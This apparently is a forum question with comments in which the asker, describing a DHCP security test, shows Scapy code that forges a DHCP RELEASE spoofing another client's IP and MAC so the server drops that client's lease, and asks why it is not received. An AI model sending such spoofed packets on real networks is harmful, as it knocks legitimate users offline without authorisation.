# sending DHCP release for another client scapy

Tags: python, scapy, dhcp

I'm trying to test the security of Protocol DHCP
Within that framework, I try to send a release
From a client on behalf of another client.
This is the message that I send:

```
dhcp_release = Ether(src=srcmac,dst=dhcpmac)/IP(src='10.0.0.2',dst='10.0.0.138')/UDP(sport=68,dport=67)/BOOTP(ciaddr='10.0.0.2',chaddr=hw,xid=random.randint(0, 0xFFFFFFFF),)/DHCP(options=[("message-type","release"),("server_id",'10.0.0.138'),("client_id",chr(1),hw),"end"])
```

The problem is that it does not appear to me in wireshark of  attacker
And not in the client's I'm trying to throw

However when I send the request like this

```
dhcp_release = IP(src='10.0.0.2',dst='10.0.0.138')/UDP(sport=68,dport=67)/BOOTP(ciaddr='10.0.0.2',chaddr=hw,xid=random.randint(0, 0xFFFFFFFF),)/DHCP(options=[("message-type","release"),("server_id",'10.0.0.138'),("client_id",chr(1),hw),"end"])
```

I see the release in attacker wireshark but not in my client(victim)
How do i fix it ?

Comment: Which functions are you using to send the packets? Are you aware of the [difference between `send()` and `sendp()`](http://www.secdev.org/projects/scapy/doc/usage.html#sending-packets)?

Comment: i used at sendp() but also tried send() they both work the same in this case , none of them give the right outcome

Comment: But you're not sending release packet to the victim, are you?